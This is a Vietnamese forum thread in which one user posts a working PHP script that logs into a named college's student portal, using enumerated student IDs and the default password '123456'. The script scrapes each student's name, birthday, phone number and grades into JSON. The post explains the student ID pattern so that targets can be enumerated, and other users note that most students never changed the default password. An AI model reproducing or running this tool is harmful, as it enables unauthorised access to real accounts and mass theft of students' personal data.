Share1200028852225632147.0

**mad** · 04.04.2020 / 14:03

PHP

<?php
header("Content-type: application/javascript; charset=UTF-8");
function getparma($mssv){
$data=file_get_contents("http://tgc.edu.vn/Sinhvien.aspx");
$gp=preg_split("<form(.+?)\">",$data);
$gp=explode("</form>",$gp[2]);
$gs=explode("<input",$gp[0]);
$ee="";
for($i=1;$i<count($gs);$i++){
$da=explode("/>",$gs[$i]);
$name=explode("name=\"",$da[0]);
$name=explode("\"",$name[1]);
if($name[0]!='ctl00$ContentPlaceHolder1$txtPass' and $name[0]!='ctl00$ContentPlaceHolder1$txtUser'){
$vals=explode("value=\"",$da[0]);
$vals=explode("\"",$vals[1]);
}
if($name[0]=='ctl00$ContentPlaceHolder1$txtPass'){
$vala="123456";
}elseif($name[0]=='ctl00$ContentPlaceHolder1$txtUser'){
$vala=$mssv;
}else{
$vala=$vals[0];
}
$ee.="\"".$name[0]."\":\"".$vala."\"";
if($i<count($gs)-1){
$ee.=",";
}
}
return json_decode("{".$ee."}",true);
}
function curl($mssv){
$param = getparma($mssv);
$url = 'http://tgc.edu.vn/Sinhvien.aspx';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, count($param));
curl_setopt($ch, CURLOPT_POSTFIELDS, $param); 
$data = curl_exec($ch);
curl_close($ch);
if(preg_match("/<div id=\"ContentPlaceHolder1_PanelSV_Info\">/",$data,$matches)){
$info=explode("<div id=\"ContentPlaceHolder1_PanelSV_Info\">",$data);
$profile=explode("<table>",$info[1]);
$profile=explode("</table>",$profile[0]);
$mssv=explode("<span id=\"ContentPlaceHolder1_lblMaso\">",$profile[0]);
$mssv=explode("</span>",$mssv[1]);
$name=explode("<span id=\"ContentPlaceHolder1_lblHovaten\">",$profile[0]);
$name=explode("</span>",$name[1]);
$birthday=explode("<span id=\"ContentPlaceHolder1_lblNgaysinh\">",$profile[0]);
$birthday=explode("</span>",$birthday[1]);
$phone=explode("<span id=\"ContentPlaceHolder1_lblDienthoai\">",$profile[0]);
$phone=explode("</span>",$phone[1]);
$mark=preg_split('/<table(.+?)id\=\"ContentPlaceHolder1_GridViewKQHT\"(.+?)>/',$info[1]);
$mark=explode("</table>",$mark[1]);
$rows=preg_split("/<tr bgcolor=\"(.+?)\">/",$mark[0]);
$fm=array();
for($i=1; $i<count($rows);$i++){
$fm[$i-1]=array();
$rs=explode("</tr>",$rows[$i]);
//echo $rs[0];
if($i==1){
$ft=explode('<th scope="col"><font color="White"><b>',$rs[0]);
for($j=1;$j<count($ft)-1;$j++){
$um=explode("</b></font></th>",$ft[$j]);
$fm[$i-1][$j-1]=$um[0];
}
}else{
$fd=preg_split("/<td(.+?)><font color=\"(.+?)\">/",$rs[0]);
for($j=1;$j<count($fd)-1;$j++){
$um=explode("</font></td>",$fd[$j]);
$fm[$i-1][$j-1]=$um[0];
}
}
}
return array(
"info"=>array(
"id"=>$mssv[0],
"name"=>$name[0],
"birthday"=>$birthday[0],
"phone"=>$phone[0]
),
"mark"=>$fm
);
}
}
if($_GET){
$id=$_GET["id"];
echo json_encode(curl($id));
}

biết làm gì rồi đó

user: (CNT|ĐCN|MTT|CNO|KTD|VSL|KTL|KTX)(17|18|19|20)(a|c)(1|2|3|4|5|6|7)(01-99)

-------Mã lớp-----------------------------------------------Niên Khóa---(***)-(****)-----------(*****)

(***) a -> cao đẳng b -> trung cấp

(****) số lớp phân chia gồm bao nhiêu lớp của nghề

(*****) số id của sinh viên

Example user: CNT19c101

pass default 123456

**MrKen** · 04.04.2020 / 17:59

cái này ông nào chưa đổi pass mới dính thôi =))

**mad** · 04.04.2020 / 18:13

Mà đa số chưa đổi

**hanhphucao** · 04.04.2020 / 19:12

Tưởng tìm ra lỗ hổng reset password